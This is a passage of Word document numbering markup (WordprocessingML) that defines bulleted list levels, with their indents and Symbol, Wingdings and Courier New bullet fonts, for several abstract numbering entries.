      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3A94A500">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="696825EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9FFAE9F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6632F740">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FBA81DA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1CD6BE08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39EE4393"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="947CD894">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="27A2D07E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EADCC306">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="52F4D47A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0C8A8D0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D5EEC9E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5F8A8E9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="807C8B74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="80D4E9FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3A61D680"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A3F47280">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="31BC4CC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="51BAB202">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7CCCFB32">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5BECC3F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A8067ADA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A3C2D256">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D08C1C16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E5BC0E48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3C591DFE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="94D0649C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0CC8CE26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="24A429B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C6064A3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="94FADAE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="27B2203E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="373A3882">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="555E6144">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D9E82CE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="446778A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="ED2A1D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1E3ADEB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9C68E264">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D7A8DD00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E9D2C2B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B6FC900C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AE349F56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="34C28162">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F1F61334">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4573511A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="09F0B8C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E121516">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="58E49B86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D614364A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="11624288">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B964B7C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8B0253BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D904E6AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D7DA417C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46CE0A30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="45368DA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2D9C3836">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C390E586">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DDDCDB14">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="34EA7888">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9D6E1CFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="74BCBCBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5C26864A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5878551E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="42" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4762B57F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5F2EDD30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FA6CCB24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C7824CC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CF7C51CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DB8E80D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D01A2C72">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="87A8C260">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8996E1EC">
